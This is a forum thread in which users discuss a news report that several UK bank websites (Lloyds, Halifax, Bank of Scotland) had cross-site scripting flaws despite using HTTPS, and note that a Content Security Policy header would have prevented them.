dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
296
HELLFIRE
MVM
join:2009-11-25

3 recommendations

HELLFIRE

MVM

Banking is secure because it's HTTPS,right? Weeeeeell...

»www.theregister.co.uk/20 ··· nsecure/
quote:
Each of the three LBG banks – Lloyds, Halifax, and Bank of Scotland – has implemented transport layer security by running https so that transactions run to a secure server. But the three financial institutions are nonetheless vulnerable to a common class of web security vulnerability often exploited by phishing fraudsters: cross-site scripting (XSS) flaws. A software developer and an infosec researcher have separately said that websites maintained by Lloyds, Halifax, and Bank of Scotland all have an XSS vuln, allowing attackers to read and modify the contents of the login form, as well as subsequent pages such as account information in secure banking sessions. Halifax Bank rates a "B" on security headers, which may on the surface seem like a passing grade but belies the problem. The devil lies in the detail, according to (Paul) Moore. “A ‘B’ isn't bad, but the difference between an ‘A’ and ‘B’ here is the existence of a CSP [Content Security Policy]1 header. If they disallowed inline scripts, they'd get an ‘A’ and wouldn't be vulnerable to this attack,” Moore said.
Reminds me of every other "I'm safe from [insert threat here], I've a [insert defence here]!" statement. Till you get into the nuts and bolts AND the people that actually know what they're talking about...

Now I wonder who else may have this vulnerability AND is passing critical information through it that'd be of interest to nefarious actor(s)?

Regards

StuartMW
Premium Member
join:2000-08-06

2 recommendations

StuartMW

Premium Member

Halifax, now where have I heard that name before? Oh yeah...

»UK Halifax Bank says has right to portscan your computer "for security"

. o O (Oh the ironing)